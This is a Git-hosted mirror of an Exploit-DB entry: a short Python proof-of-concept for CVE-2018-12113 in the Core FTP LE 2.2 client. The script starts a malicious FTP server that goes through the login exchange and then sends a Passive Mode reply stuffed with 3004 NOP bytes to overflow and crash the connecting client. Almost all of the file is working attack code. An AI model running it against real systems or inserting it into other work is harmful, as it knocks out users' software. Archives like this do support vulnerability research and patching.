bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/44958.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

50 lines
No EOL
1.3 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Core FTP LE 2.2 - Buffer Overflow (PoC)
# Date: 2018-06-28
# Exploit Author: Berk Cem Göksel
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download
# Version: Core FTP Client LE v2.2 Build 1921
# Tested on: Windows 10
# Category: Dos
# CVE : CVE-2018-12113
# coding: utf-8
# Description:]
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
#!/usr/bin/env python
import socket
IP = '0.0.0.0'
port = 21
Stack_beginning = 3004
buff = "\x90" * (3004)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + '\r\n')
print conn.recv(1024)
conn.send('331 OK.\r\n')
print conn.recv(1024)
conn.send('230 OK.\r\n')
print conn.recv(1024)
conn.send('215 UNIX Type: L8\r\n')
print conn.recv(1024)
conn.send('257 "/" is current directory.\r\n')
print conn.recv(1024)
conn.send('227 Entering Passive Mode (' + buff + ')\r\n')
print conn.recv(1024)
conn.send('257' + '\r\n')
Reference in a new issue View git blame Copy permalink